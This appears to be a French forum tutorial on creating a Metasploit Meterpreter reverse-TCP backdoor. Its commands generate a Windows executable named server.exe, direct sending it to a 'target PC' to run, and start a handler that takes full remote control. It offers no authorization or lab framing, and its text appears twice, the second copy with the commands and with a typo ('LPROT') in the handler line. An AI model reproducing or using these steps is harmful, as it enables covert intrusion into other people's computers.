Backdoor avec Metasploit et Meterpreter
Avertissement: Cette technique ne fonctione que si le PC-Cible est sous Windows XP
Veillez à ce que Metasploit soit à jour:
I-Ouvrez le terminal en root
II-Ensuite taper cette commande :
LHOST=192.168.2.12: à remplacer par votre IP.
LPORT=4444: Vous pouvez changer le port si vous souhaitez.
server.exe: Vous pouvez changer le nom à votre guise.
A ce stade vous devriez voir sur votre Bureau un "server.exe".
Maintenant vous n'avez plus qu'a l'envoyer à votre PC-Cible , vous remarquez que Metasploit à créer un .exe donc uniquement pour un PC-Cible sous Windows.
III-Maintenant assurez vous que votre PC-cible à bien executer votre server.exe (ou un autre nom si vous l'avez changé) et entreé cette commande :
LHOST=192.168.2.12: à remplacer par l'IP que vous avez renseigné auparavant.
LPORT=4444: à remplacer par le Port que vous avez renseigné auparavant.
Metasploit va alors chercher à se connecter au PC-Cible
Une fois que vous êtes connecterà la cible vous devriez voir quelque chose ressemblant à ceci :
Vous êtes désormais connecté au PC-Cible
IV-Exércer votre contrôle.
Vous pouvez afficher toutes les commandes avec
Vous avez maintenant un contrôle total sur votre PC-Cible.
Merci d'avoir lu mon tutoriel.
Avertissement: Cette technique ne fonctione que si le PC-Cible est sous Windows XP
Veillez à ce que Metasploit soit à jour:
Code:
msfupdate
I-Ouvrez le terminal en root
II-Ensuite taper cette commande :
Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.12 LPORT=4444 X > server.exe
LHOST=192.168.2.12: à remplacer par votre IP.
LPORT=4444: Vous pouvez changer le port si vous souhaitez.
server.exe: Vous pouvez changer le nom à votre guise.
A ce stade vous devriez voir sur votre Bureau un "server.exe".
Maintenant vous n'avez plus qu'a l'envoyer à votre PC-Cible , vous remarquez que Metasploit à créer un .exe donc uniquement pour un PC-Cible sous Windows.
III-Maintenant assurez vous que votre PC-cible à bien executer votre server.exe (ou un autre nom si vous l'avez changé) et entreé cette commande :
Code:
msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp LHOST=192.168.2.12 LPROT=4444 E
LPORT=4444: à remplacer par le Port que vous avez renseigné auparavant.
Metasploit va alors chercher à se connecter au PC-Cible
Une fois que vous êtes connecterà la cible vous devriez voir quelque chose ressemblant à ceci :
Code:
Meterpreter session 1 opened ( VotreIP:VotrePort -> VictimeIP:VictimePort) Date Heure
IV-Exércer votre contrôle.
Vous pouvez afficher toutes les commandes avec
Code:
help
Merci d'avoir lu mon tutoriel.
Commentaire